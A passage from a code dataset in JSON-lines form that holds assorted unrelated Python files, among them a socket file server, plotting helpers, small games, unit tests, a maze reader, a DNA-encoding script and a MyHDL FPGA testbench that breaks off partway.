sock.accept()\n\n# recieves folder name\ndrctr_name = conn.recv(20)\ndrctr_name = str(drctr_name.decode(\"utf-8\"))\nconn.send(b'ok')\n\npath_sort = os.path.join(drctr_path, drctr_name)\n\n# function recieves diriectory form client and saves\nserver_recv(drctr_path, conn)\n\nsock.close()\nconn.close()\n\n# function sorts recived files\nsort_tree(path_sort)\n\n\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"187611045","text":"import pandas as pd\nimport plotly\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\n\nplotly.offline.init_notebook_mode(connected=True)\nimport plotly.io as pio\nimport os\n\ndef make_plot(x, z):\n data = [go.Choropleth(\n locations = x,\n z = z,\n text = x,\n locationmode=\"country names\",\n autocolorscale = True,\n marker = go.choropleth.Marker(\n line = go.choropleth.marker.Line(\n color = 'rgb(0,0,0)',\n width = 0.5\n )),\n colorbar = go.choropleth.ColorBar(\n len=0.5\n ),\n )]\n\n layout = go.Layout(\n height=700,\n width=700,\n margin={\"t\": 0, \"b\": 0, \"l\": 0, \"r\": 0},\n geo = go.layout.Geo(\n showframe = True,\n showcoastlines = True,\n showcountries = True,\n projection = go.layout.geo.Projection(\n type = 'mercator'\n )\n )\n )\n\n fig = go.Figure(data = data, layout = layout)\n iplot(fig)","sub_path":"unicorns-per-capita/.ipynb_checkpoints/plot-checkpoint.py","file_name":"plot-checkpoint.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"510357152","text":"import wx\nimport random\n\n\ndef Font(size):\n return wx.Font(size, wx.DEFAULT, wx.FONTSTYLE_NORMAL, wx.NORMAL)\n\n\nclass Frame(wx.Frame):\n def __init__(self):\n super().__init__(None, -1, \"猜数字小游戏\", size=(310, 150),\n style=wx.DEFAULT_FRAME_STYLE ^ wx.RESIZE_BORDER ^ wx.MAXIMIZE_BOX)\n self.Center()\n\n self.Number = random.randint(1, 10)\n self.Count = 0\n\n panel = wx.Panel(self)\n\n wx.StaticText(panel, -1, \"猜猜我心里想的是什么数字吧!\", (10, 10)).SetFont(Font(15))\n\n self.NumberChooser = wx.ComboBox(panel, -1, \"1\", (80, 40), (120, 30),\n choices=['1', '2', '3', '4', '5',\n '6', '7', '8', '9', '10'],\n style=wx.CB_READONLY)\n\n self.ConfirmButton = wx.Button(panel, -1, \"确定\", (90, 75), (100, 30))\n self.ConfirmButton.Bind(wx.EVT_BUTTON, self.Confirm)\n\n def Confirm(self, event):\n self.Count += 1\n user_number = int(self.NumberChooser.GetStringSelection())\n\n if self.Number == user_number:\n wx.MessageBox(\"恭喜你,猜对了!你一共猜了 {} 次!\".format(str(self.Count)),\n \"你猜对了\", parent=self)\n wx.MessageBox(\"游戏结束\", \"游戏结束\", parent=self)\n exit()\n elif self.Number > user_number:\n wx.MessageBox(\"你怎么会猜这么小的数字了\",\n \"猜错了\", style=wx.OK | wx.CENTER | wx.ICON_WARNING, parent=self)\n elif self.Number < user_number:\n wx.MessageBox(\"你猜的太大了\",\n \"猜错了\", style=wx.OK | wx.CENTER | wx.ICON_WARNING, parent=self)\n\n\nif __name__ == '__main__':\n app = wx.App()\n Frame().Show()\n app.MainLoop()","sub_path":"gui_2.py","file_name":"gui_2.py","file_ext":"py","file_size_in_byte":1872,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"456481347","text":"# -*- coding:utf-8 -*-\n# create_time: 2018/12/3 14:03\n# __author__ = 'brad'\n\nclass AddClassMethod(classmethod):\n # def __init__(self, **kwargs):\n # print(kwargs)\n def __new__(cls, *args, **kwargs):\n print(args)\n print(kwargs)\n super.__new__(cls,args, kwargs)\n\n # def __get__(self, *args, **kwargs): # real signature unknown\n # \"\"\" Return an attribute of instance, which is of type owner. \"\"\"\n # super().__get__(args, kwargs)\n\n\nclass A:\n\n @AddClassMethod\n def test(cls, **kwargs):\n print('test')\n\n\nA.test(id=5)\n","sub_path":"a_concept/classmethod_learn/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"50142962","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2015, Frappe Technologies and Contributors\n# See license.txt\nfrom __future__ import unicode_literals\n\nimport frappe\nimport unittest\n\nfrom frappe import _\n\nclass TestTranslation(unittest.TestCase):\n\tdef tearDown(self):\n\t\tfrappe.local.lang = 'en'\n\t\tfrappe.local.lang_full_dict=None\n\n\tdef test_doctype(self):\n\t\ttranslation_data = get_translation_data()\n\t\tfor key, val in translation_data.items():\n\t\t\tfrappe.local.lang = key\n\t\t\tfrappe.local.lang_full_dict=None\n\t\t\ttranslation = create_translation(key, val)\n\t\t\tself.assertEquals(_(translation.source_name), val[1])\n\n\t\t\tfrappe.delete_doc('Translation', translation.name)\n\t\t\tfrappe.local.lang_full_dict=None\n\t\t\tself.assertEquals(_(translation.source_name), val[0])\n\ndef get_translation_data():\n\thtml_source_data = \"\"\" \n\t\t\t\t\t\t\tTest Data \"\"\"\n\thtml_translated_data = \"\"\" \n\t\t\t\t\t\t\t testituloksia \"\"\"\n\n\treturn {'hr': ['Test data', 'Testdaten'],\n\t\t\t'ms': ['Test Data','ujian Data'],\n\t\t\t'et': ['Test Data', 'testandmed'],\n\t\t\t'en': ['Quotation', 'Tax Invoice'],\n\t\t\t'fi': [html_source_data, html_translated_data]}\n\ndef create_translation(key, val):\n\ttranslation = frappe.new_doc('Translation')\n\ttranslation.language_code = key\n\ttranslation.source_name = val[0]\n\ttranslation.target_name = val[1]\n\ttranslation.save()\n\treturn translation\n","sub_path":"frappe/core/doctype/translation/test_translation.py","file_name":"test_translation.py","file_ext":"py","file_size_in_byte":1568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"28511623","text":"#!/usr/bin/env python3\n# encoding: utf-8\n\ndef main():\n\ta, b = 1, 2\n\tsum = 0\n\twhile a < 4000000:\n\t\t\ta, b = b, a + b\n\t\t\tif not a%2:\n\t\t\t\tsum = sum + a\n\tprint(sum)\n\n\n\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"euler1.py","file_name":"euler1.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"540377229","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 2 13:54:43 2018\r\n\r\n@author: tcarr\r\n\"\"\"\r\nimport sys \r\nimport itertools\r\nDNA = None\r\nfile = \"CD11b.fa\"\r\nf = open(file,\"r\")\r\nDNA = f.read().splitlines()\r\nprint(DNA)\r\nkey = lambda sep: sep == '>'\r\n\r\n\r\nA = 0\r\nC = 0\r\nG = 0\r\nT = 0\r\nother = 0\r\nfor i in range (0, len(DNA)-1):\r\n if DNA[i]==\"A\":\r\n A += 1\r\n elif DNA[i]==\"C\":\r\n C += 1\r\n elif DNA[i]==\"G\":\r\n G += 1\r\n elif DNA[i]==\"T\":\r\n T += 1\r\n else:\r\n other += 1\r\n\r\nif len(sys.argv)==2:\r\n print(\"%A: \",A/(A+C+G+T)*100)\r\n print(\"%C: \",C/(A+C+G+T)*100)\r\n print(\"%G: \",G/(A+C+G+T)*100)\r\n print(\"%T: \",T/(A+C+G+T)*100)\r\n print(\"%other: \",other/(A+C+G+T)*100)\r\n print(\"\\n\")\r\n print(\"% GC\" ,(C+G)/(A+C+G+T)*100)\r\n print(\"% AT \",(A+T)/(A+C+G+T)*100)\r\nelif len(sys.argv)==3:\r\n if sys.argv[2]==\"GC\":\r\n print(\"% GC \" ,(C+G)/(A+C+G+T)*100)\r\n elif sys.argv[2]==\"AT\":\r\n print(\"% AT \",(A+T)/(A+C+G+T)*100)\r\n else:\r\n print(\"Type \\\"GC\\\" for % GC or \\\"AT\\\" for % AT\")\r\nelse:\r\n print(\"Please only pass a file path and GC/AT option for this script.\")\r\n ","sub_path":"mult_ensembl_gc.py","file_name":"mult_ensembl_gc.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"91628351","text":"import os\nimport unittest\n\nfrom covid_analysis.model import Config, CountrySummary\n\n\nclass CountrySummaryTest(unittest.TestCase):\n def test_it_can_be_converted_to_flat_dict(self):\n summary = CountrySummary()\n summary.name = \"test\"\n summary.new_deaths = 100\n summary.total_deaths = 1000\n summary.new_confirmed = 200\n summary.total_confirmed = 2000\n summary.new_recovered = 300\n summary.total_recovered = 3000\n\n self.assertEqual(\n {\n \"name\": \"test\",\n \"new_deaths\": 100,\n \"total_deaths\": 1000,\n \"new_confirmed\": 200,\n \"total_confirmed\": 2000,\n \"new_recovered\": 300,\n \"total_recovered\": 3000,\n },\n summary.to_dict(),\n )\n\n def test_two_country_summaries_can_be_compared_for_equality(self):\n summary1 = CountrySummary()\n summary1.name = \"test\"\n summary1.new_deaths = 100\n summary1.total_deaths = 1000\n summary1.new_confirmed = 200\n summary1.total_confirmed = 2000\n summary1.new_recovered = 300\n summary1.total_recovered = 3000\n\n summary2 = CountrySummary()\n summary2.name = \"test\"\n summary2.new_deaths = 100\n summary2.total_deaths = 1000\n summary2.new_confirmed = 200\n summary2.total_confirmed = 2000\n summary2.new_recovered = 300\n summary2.total_recovered = 3000\n\n self.assertEqual(summary1, summary2)\n","sub_path":"covid_analysis/tests/CountrySummaryTest.py","file_name":"CountrySummaryTest.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"533365624","text":"from elements import*\nfrom gravity import Gravity\nfrom planet import Planet\nfrom meteor import Meteor\nfrom shopWindow import*\n\nclass World:\n\n def __init__(self,parent):\n\n self.parent = parent\n self.width = parent.width\n self.height = parent.height\n self.planet = Planet(parent,self)\n self.objects = []\n self.message = []\n\n self.satellite = 0\n\n self.info = [['Temperature',0],['Air pressure',0],['Water',0],['CO2',0],['O2',0],['Satellite',0],['Mine',0],['Nuclear',0],['Algae',0],['Tree',0],['Animal',0]]\n\n def addObject(self,moverName,location,velocity):\n \n if moverName == '':\n return\n mover = Meteor(self.parent,self,location=location,velocity=velocity)\n\n if Inventory.items[ShopWindow.items.index(moverName)] == 0:\n return\n Inventory.items[ShopWindow.items.index(moverName)] -= 1\n\n if moverName == 'Fire':\n mover = Fire(self.parent,self,location=location,velocity=velocity,image='red.png')\n\n if moverName == 'Ice':\n mover = Ice(self.parent,self,location=location,velocity=velocity,image='blue.png')\n\n if moverName == 'Dry Ice':\n mover = DryIce(self.parent,self,location=location,velocity=velocity,image='purple.png')\n\n if moverName == 'Satellite':\n mover = Satellite(self.parent,self,location=location,velocity=velocity,image='satellite.png')\n \n if moverName == 'Mine':\n mover = Mine(self.parent,self,location=location,velocity=velocity,image='mine.png')\n \n if moverName == 'Nuclear':\n mover = Nuclear(self.parent,self,location=location,velocity=velocity,image='nuclear.png')\n \n if moverName == 'Algae':\n mover = Algae(self.parent,self,location=location,velocity=velocity,image='algae.png')\n\n if moverName == 'Tree':\n mover = Tree(self.parent,self,location=location,velocity=velocity,image='tree.png')\n \n if moverName == 'Animal':\n mover = Animal(self.parent,self,location=location,velocity=velocity,image='animal.png')\n\n self.objects.append(mover)\n\n def run(self):\n\n self.objects = [m for m in self.objects if not m.isDead()]\n self.satellite = 0\n for m in self.objects:\n if type(m) == type(Satellite(self.parent,self)):\n self.satellite += 1\n m.run()\n m.applyForce(Gravity.getForce(m.location,self.planet.location))\n\n for m2 in self.objects:\n if m == m2:\n continue\n if m.isCollide() or m2.isCollide():\n continue\n if m.isCollide(m2):\n m.explosion()\n m2.explosion()\n\n self.planet.run()\n\n self.update()\n\n self.output()\n\n def update(self):\n self.info[0][1] = self.planet.temperature\n self.info[1][1] = self.planet.atmosphere\n self.info[2][1] = self.planet.water\n self.info[3][1] = self.planet.co2\n self.info[4][1] = self.planet.oxygen\n self.info[5][1] = self.satellite\n self.info[6][1] = self.planet.mine\n self.info[7][1] = self.planet.nuclear\n self.info[8][1] = self.planet.algae\n self.info[9][1] = self.planet.tree\n self.info[10][1] = self.planet.animal\n\n\n def output(self):\n\n margin = 0\n length = len(self.message)\n\n for i in range(length-1,-1,-1):\n margin = self.height-100-(length-i)*50\n text = self.message[i][0]\n cnt = self.message[i][1]\n\n if cnt > 112:\n color = QColor(255,255,255,(128-cnt)*16)\n elif cnt < 16:\n color = QColor(255,255,255,cnt*16)\n else:\n color = QColor(255,255,255)\n\n pen = QColor(color)\n font = QFont('Consolas',15)\n\n qp = QPainter()\n qp.begin(self.parent)\n qp.setPen(pen)\n qp.setFont(font)\n qp.drawText(50,margin,text)\n qp.end()\n\n if cnt == 0:\n self.message.pop(i)\n else:\n self.message[i][1] -= 1\n\n def getInfo(self,id):\n if id >= 8:\n return self.planet.getAmount(self.info[id][1])\n if id >= 5:\n return str(self.info[id][1])\n if id >= 2:\n return self.planet.getAmount(self.info[id][1])\n return self.planet.getStatus(self.info[id][1])\n \n\n \n","sub_path":"world.py","file_name":"world.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"126485030","text":"from pysensationcore import *\nimport sensation_helpers as sh\n\nblock = defineBlock(\"ExtrudedCircle\")\ndefineInputs(block,\n \"objectCentre\",\t\n \"radius\",\n \"extrusionDirection\",\n \"palm_position\",\n \"palm_normal\")\ndefineOutputs(block, \"out\")\n\ndefineBlockInputDefaultValue(block.objectCentre, (0.0,0.2,0))\ndefineBlockInputDefaultValue(block.radius, (0.03,0,0))\ndefineBlockInputDefaultValue(block.palm_position, (0,0.2,0))\ndefineBlockInputDefaultValue(block.palm_normal, (0,0,0))\ndefineBlockInputDefaultValue(block.extrusionDirection, (0.0, 1.0, 0.0))\n\nsetMetaData(block.objectCentre, \"Type\", \"Point\")\nsetMetaData(block.radius, \"Type\", \"Scalar\")\nsetMetaData(block.extrusionDirection, \"Input-Visibility\", False)\nsetMetaData(block.palm_normal, \"Input-Visibility\", False)\nsetMetaData(block.palm_position, \"Input-Visibility\", False)\n\ncircle = createInstance(\"CirclePath\", \"circlePath\")\nconnect(block.radius, circle.radius)\n\n# Transform from Virtual Space to Emitter space\ntransformInstance = createInstance(\"ComposeTransform\", \"transformInstance\")\nconnect(Constant((1, 0, 0)), transformInstance.x)\nconnect(Constant((0, 0, 1)), transformInstance.y)\nconnect(Constant((0, 1, 0)), transformInstance.z)\nconnect(block.objectCentre, transformInstance.o)\n\ntransformPathInstance = createInstance(\"TransformPath\", \"transformPathInstance\")\nconnect(transformInstance.out, transformPathInstance.transform)\nconnect(circle.out, transformPathInstance.path)\n\nprojectedPath = createInstance(\"ProjectPathOntoPlane\", \"projectedPath\")\nconnect(transformPathInstance.out, projectedPath.path)\nconnect(block.extrusionDirection, projectedPath.projectionDirection)\nconnect(block.palm_position, projectedPath.planePoint)\nconnect(block.palm_normal, projectedPath.planeNormal)\n\nfocalPoints = sh.createVirtualToPhysicalFocalPointPipeline(block,\n projectedPath.out,\n renderMode=sh.RenderMode.Loop,\n drawFrequency = 70)\n\nevalOnlyIfIntersecting = createInstance(\"Comparator\", \"evalOnlyIfIntersecting\")\nconnect(projectedPath.valid, evalOnlyIfIntersecting.a)\nconnect(Constant((1,0,0)), evalOnlyIfIntersecting.b)\nconnect(Constant((0,0,0,0)), evalOnlyIfIntersecting.returnValueIfAGreaterThanB)\nconnect(focalPoints, evalOnlyIfIntersecting.returnValueIfAEqualsB)\nconnect(Constant((0,0,0,0)), evalOnlyIfIntersecting.returnValueIfALessThanB)\nconnect(evalOnlyIfIntersecting.out, block.out)\n","sub_path":"Data_Vis_mrtk/Assets/StreamingAssets/Python/BlockLibraries/UnityExamples/ExtrudedCircleSensation.py","file_name":"ExtrudedCircleSensation.py","file_ext":"py","file_size_in_byte":2567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"303427804","text":"\"\"\"\nsettings_context_processor.py\n\nUse this file to define values from the settings and local_settings files to be used in templates\n\n\"\"\"\n__author__ = 'mark'\n\nfrom django.conf import settings as django_settings\nfrom django.core.exceptions import ImproperlyConfigured\n\ndef config_settings(request):\n config_dict = {\n }\n\n return config_dict\n\n\ndef settings(request):\n \"\"\"\n Adds the settings specified in settings.TEMPLATE_VISIBLE_SETTINGS to\n the request context.\n Add the names of any parameters specified in settings.py to\n TEMPLATE_VISIBLE_SETTINGS.\n Variables must be defined before being referenced in TEMPLATE_VISIBLE_SETTINGS\n These values can then be used in templates using {{ VARIABLE }}.\n \"\"\"\n new_settings = {}\n #print django_settings.TEMPLATE_VISIBLE_SETTINGS\n for attr in getattr(django_settings, \"TEMPLATE_VISIBLE_SETTINGS\", ()):\n try:\n new_settings[attr] = getattr(django_settings, attr)\n except AttributeError:\n m = \"TEMPLATE_VISIBLE_SETTINGS: '{0}' does not exist\".format(attr)\n raise ImproperlyConfigured(m);\n return new_settings","sub_path":"bbp/bbp/settings_context_processor.py","file_name":"settings_context_processor.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"299778604","text":"\n# ASCII string \ninp_text = input(\"Enter a string of ASCII characters:\")\n# list of ascii values of each char in string\nascii_list = []\n# Binary numbers converted to strings\nbinary_list = []\n# ascii list encoded to DNA characters\nencoded_list = []\n# Dict to hold DNA constants\ndna_const = {'00':'A', '01':'T', '10':'G', '11':'C'}\n\n# function to convert binary numbers into DNA encoded value\ndef encode_bin(bin_string):\n bin_string = bin_string[2:]\n while len(bin_string) < 8:\n bin_string = '0' + bin_string\n bin_list = []\n for i in range(4):\n bin_list.append(bin_string[:2])\n bin_string = bin_string[2:]\n for item in bin_list:\n if item == '00':\n encoded_list.append('A')\n elif item == '01':\n encoded_list.append('T')\n elif item == '10':\n encoded_list.append('G')\n else:\n encoded_list.append('C')\n\n\n # print(bin_list)\n\n \n\n# To convert the string to ascii/binary (if binary is needed)\ndef convert_ascii(ascii_string):\n for char in ascii_string:\n ascii_list.append(ord(char))\n for item in ascii_list:\n binary_list.append(str(bin(item)))\n for item in binary_list:\n encode_bin(item)\n\nconvert_ascii(inp_text) \n# print (ascii_list)\n# print (binary_list)\n# print (encoded_list)\n\nencoded_string = \"\"\nfor item in encoded_list:\n encoded_string = encoded_string + item\n\nprint(encoded_string)\n\n","sub_path":"algos/ascii_dna.py","file_name":"ascii_dna.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"529150732","text":"import pyglet\nfrom pyglet.gl import *\nfrom random import *\n\nwindow = pyglet.window.Window(1024,768)\n\n#colors (pairs of 3)\nsquare_white = (255,255,255,255,255,255,255,255,255,255,255,255)\nsquare_black = (0,0,0,0,0,0,0,0,0,0,0,0)\n\nsize = 50\ntiles = [[0 for col in range(size)] for row in range(size)]\n\nfor i in xrange(0, size):\n\tfor j in xrange(0, size):\n\t\ttiles[i][j] = randint(0,1)\n\ndef get_value(r, c):\n\ttry:\n\t\tr = int(tiles[r][c] or 0)\n\t\treturn r\n\texcept IndexError:\n\t\treturn 0\n\n\ndef add_neighbors(row, col):\n\ttotal = 0\n\n\tneighborValues =[\n\t\t[row-1, col-1],\n\t\t[row-1, col],\n\t\t[row-1, col+1],\n\t\t[row, col-1],\n\t\t[row, col+1],\n\t\t[row+1, col-1],\n\t\t[row+1, col],\n\t\t[row+1, col+1]\n\t]\n\n\tfor item in neighborValues:\n\t\ttotal += get_value(item[0], item[1])\n\n\treturn total\n\n\ndef game_of_life(t, state):\n\t# is currently alive\n\tif state == 1: \n\t\t# any live cell with fewer than two live neighbors dies - under-population\n\t\tif t < 2: \n\t\t\treturn 0\n\t\t# any live cell with two or three live neighbors lives on to the next generation\n\t\tif t == 2 or t == 3: \n\t\t\treturn 1\n\t\t# any live cell with more than three live neighbors dies - overcrowding\n\t\tif t > 3: \n\t\t\treturn 0\n\t#is currently dead\n\telse: \n\t\t# any dead cell with exactly three live neighbors becomes a live cell - reproduction\n\t\tif t == 3: \n\t\t\treturn 1\n\t\telse:\n\t\t\treturn 0\n\n\ndef update(dt):\n\tupdateList = []\n\tfor row in xrange(0, size):\n\t\tfor col in xrange(0, size):\n\t\t\ttotal = add_neighbors(row, col)\n\t\t\tresult = game_of_life(total, tiles[row][col])\n\t\t\tif result != tiles[row][col]:\n\t\t\t\tupdateList.append([row, col])\n\n\tfor item in updateList:\n\t\tif tiles[item[0]][item[1]] == 1:\n\t\t\ttiles[item[0]][item[1]] = 0\n\t\telse:\n\t\t\ttiles[item[0]][item[1]] = 1\n\n\n@window.event\ndef on_draw():\n for row in xrange(0, size):\n \tfor col in xrange(0, size):\n \t\tif tiles[row][col] == 1:\n \t\t\tcolor = square_black\n \t\telse:\n \t\t\tcolor = square_white\n\n \t\t#top left, top right, bottom left, bottom right\n \t\tverts = (col*50, window.height-(row*50), (col*50)+50, window.height-(row*50), \n \t\t\t\t(col*50)+50, window.height-(row*50) - 50, (col*50), window.height-(row*50) - 50) \n \t\tpyglet.graphics.draw(4, pyglet.gl.GL_QUADS,('v2i', verts),('c3B', color))\n\n\n\nif __name__ == \"__main__\":\n\tpyglet.clock.schedule_interval(update, 1/1)\n\tpyglet.app.run()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2288,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"224305873","text":"WALL_CELL = 0 # Не прохідна клітина лабіринту або його стіна\n\n\ndef readMazeFromFile(aFileName, M):\n # Функція зчитуванння лабіринту з файлу\n maze = [] # Створення порожньої матриці для задавання лабіринту\n\n global WALL_CELL\n\n row0 = [WALL_CELL] * (M + 2) # перший рядок матриці, що визначає верхіню стіну\n maze.append(row0)\n\n # Зчитуванння лабіринту з файлу\n with open(aFileName) as f:\n for str_row in f:\n row = list(map(int, str_row.split())) # Перетворення рядка у список цілих чисел\n\n if len(row) == 0: # Захист від зайвих рядків у кінці файлу\n break\n\n # додавання лівої та правої \"стіни\" лабіринту\n row.insert(0, WALL_CELL)\n row.append(WALL_CELL)\n\n maze.append(row) # додавання рядка до лабіринту\n\n rowLast = [WALL_CELL] * (M + 2) # останній рядок матриці, що визначає нижню стіну\n maze.append(rowLast)\n\n return maze # Повертаємо створений лабіринт\n\ndef showMaze(maze):\n # функція форматованого виведення матриці лабіринту\n for row in maze:\n for el in row:\n print(\"%7s\" % (el,), end=\"\")\n print()\n\n\n\nif __name__ == \"__main__\":\n maze = readMazeFromFile(\"maze1.txt\", 7)\n showMaze(maze)\n\n\n\n\n\n","sub_path":"source/T7_Graphs/P4_Maizes/L1_Read.py","file_name":"L1_Read.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"487148467","text":"#!/usr/bin/env python\n\"\"\"\n\nCopyright (c) 2019 Alex Forencich\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\n\"\"\"\n\nfrom myhdl import *\nimport os\nimport struct\n\nimport xfcp\nimport uart_ep\nimport i2c\nimport eth_ep\nimport arp_ep\nimport udp_ep\nimport mii_ep\n\nmodule = 'fpga_core'\ntestbench = 'test_%s' % module\n\nsrcs = []\n\nsrcs.append(\"../rtl/%s.v\" % module)\nsrcs.append(\"../lib/xfcp/rtl/xfcp_interface_uart.v\")\nsrcs.append(\"../lib/xfcp/rtl/xfcp_interface_udp.v\")\nsrcs.append(\"../lib/xfcp/rtl/xfcp_mod_i2c_master.v\")\nsrcs.append(\"../lib/xfcp/rtl/xfcp_mod_wb.v\")\nsrcs.append(\"../lib/xfcp/rtl/xfcp_arb.v\")\nsrcs.append(\"../lib/xfcp/rtl/xfcp_switch.v\")\nsrcs.append(\"../lib/i2c/rtl/i2c_master.v\")\nsrcs.append(\"../lib/eth/rtl/ssio_sdr_in.v\")\nsrcs.append(\"../lib/eth/rtl/mii_phy_if.v\")\nsrcs.append(\"../lib/eth/rtl/eth_mac_mii_fifo.v\")\nsrcs.append(\"../lib/eth/rtl/eth_mac_mii.v\")\nsrcs.append(\"../lib/eth/rtl/eth_mac_1g.v\")\nsrcs.append(\"../lib/eth/rtl/axis_gmii_rx.v\")\nsrcs.append(\"../lib/eth/rtl/axis_gmii_tx.v\")\nsrcs.append(\"../lib/eth/rtl/lfsr.v\")\nsrcs.append(\"../lib/eth/rtl/eth_axis_rx.v\")\nsrcs.append(\"../lib/eth/rtl/eth_axis_tx.v\")\nsrcs.append(\"../lib/eth/rtl/udp_complete.v\")\nsrcs.append(\"../lib/eth/rtl/udp_checksum_gen.v\")\nsrcs.append(\"../lib/eth/rtl/udp.v\")\nsrcs.append(\"../lib/eth/rtl/udp_ip_rx.v\")\nsrcs.append(\"../lib/eth/rtl/udp_ip_tx.v\")\nsrcs.append(\"../lib/eth/rtl/ip_complete.v\")\nsrcs.append(\"../lib/eth/rtl/ip.v\")\nsrcs.append(\"../lib/eth/rtl/ip_eth_rx.v\")\nsrcs.append(\"../lib/eth/rtl/ip_eth_tx.v\")\nsrcs.append(\"../lib/eth/rtl/ip_arb_mux.v\")\nsrcs.append(\"../lib/eth/rtl/arp.v\")\nsrcs.append(\"../lib/eth/rtl/arp_cache.v\")\nsrcs.append(\"../lib/eth/rtl/arp_eth_rx.v\")\nsrcs.append(\"../lib/eth/rtl/arp_eth_tx.v\")\nsrcs.append(\"../lib/eth/rtl/eth_arb_mux.v\")\nsrcs.append(\"../lib/uart/rtl/uart.v\")\nsrcs.append(\"../lib/uart/rtl/uart_rx.v\")\nsrcs.append(\"../lib/uart/rtl/uart_tx.v\")\nsrcs.append(\"../lib/wb/rtl/wb_ram.v\")\nsrcs.append(\"../lib/axis/rtl/arbiter.v\")\nsrcs.append(\"../lib/axis/rtl/priority_encoder.v\")\nsrcs.append(\"../lib/axis/rtl/axis_cobs_encode.v\")\nsrcs.append(\"../lib/axis/rtl/axis_cobs_decode.v\")\nsrcs.append(\"../lib/axis/rtl/axis_fifo.v\")\nsrcs.append(\"../lib/axis/rtl/axis_async_fifo.v\")\nsrcs.append(\"../lib/axis/rtl/axis_async_fifo_adapter.v\")\nsrcs.append(\"test_%s.v\" % module)\n\nsrc = ' '.join(srcs)\n\nbuild_cmd = \"iverilog -o %s.vvp %s\" % (testbench, src)\n\ndef bench():\n\n # Parameters\n TARGET = \"SIM\"\n\n # Inputs\n clk = Signal(bool(0))\n rst = Signal(bool(0))\n current_test = Signal(intbv(0)[8:])\n\n btn = Signal(intbv(0)[4:])\n sw = Signal(intbv(0)[4:])\n phy_rx_clk = Signal(bool(0))\n phy_rxd = Signal(intbv(0)[4:])\n phy_rx_dv = Signal(bool(0))\n phy_rx_er = Signal(bool(0))\n phy_col = Signal(bool(0))\n phy_crs = Signal(bool(0))\n uart_rxd = Signal(bool(1))\n\n # Outputs\n led0_r = Signal(bool(0))\n led0_g = Signal(bool(0))\n led0_b = Signal(bool(0))\n led1_r = Signal(bool(0))\n led1_g = Signal(bool(0))\n led1_b = Signal(bool(0))\n led2_r = Signal(bool(0))\n led2_g = Signal(bool(0))\n led2_b = Signal(bool(0))\n led3_r = Signal(bool(0))\n led3_g = Signal(bool(0))\n led3_b = Signal(bool(0))\n led4 = Signal(bool(0))\n led5 = Signal(bool(0))\n led6 = Signal(bool(0))\n led7 = Signal(bool(0))\n phy_tx_clk = Signal(bool(0))\n phy_txd = Signal(intbv(0)[4:])\n phy_tx_en = Signal(bool(0))\n phy_reset_n = Signal(bool(0))\n uart_txd = Signal(bool(1))\n\n # sources and sinks\n mii_source = mii_ep.MIISource()\n\n mii_source_logic = mii_source.create_logic(\n phy_rx_clk,\n rst,\n txd=phy_rxd,\n tx_en=phy_rx_dv,\n tx_er=phy_rx_er,\n name='mii_source'\n )\n\n mii_sink = mii_ep.MIISink()\n\n mii_sink_logic = mii_sink.create_logic(\n phy_tx_clk,\n rst,\n rxd=phy_txd,\n rx_dv=phy_tx_en,\n rx_er=False,\n name='mii_sink'\n )\n\n uart_source = uart_ep.UARTSource()\n\n uart_source_logic = uart_source.create_logic(\n clk,\n rst,\n txd=uart_rxd,\n prescale=int(125000000/(115200*8)),\n name='uart_source'\n )\n\n uart_sink = uart_ep.UARTSink()\n\n uart_sink_logic = uart_sink.create_logic(\n clk,\n 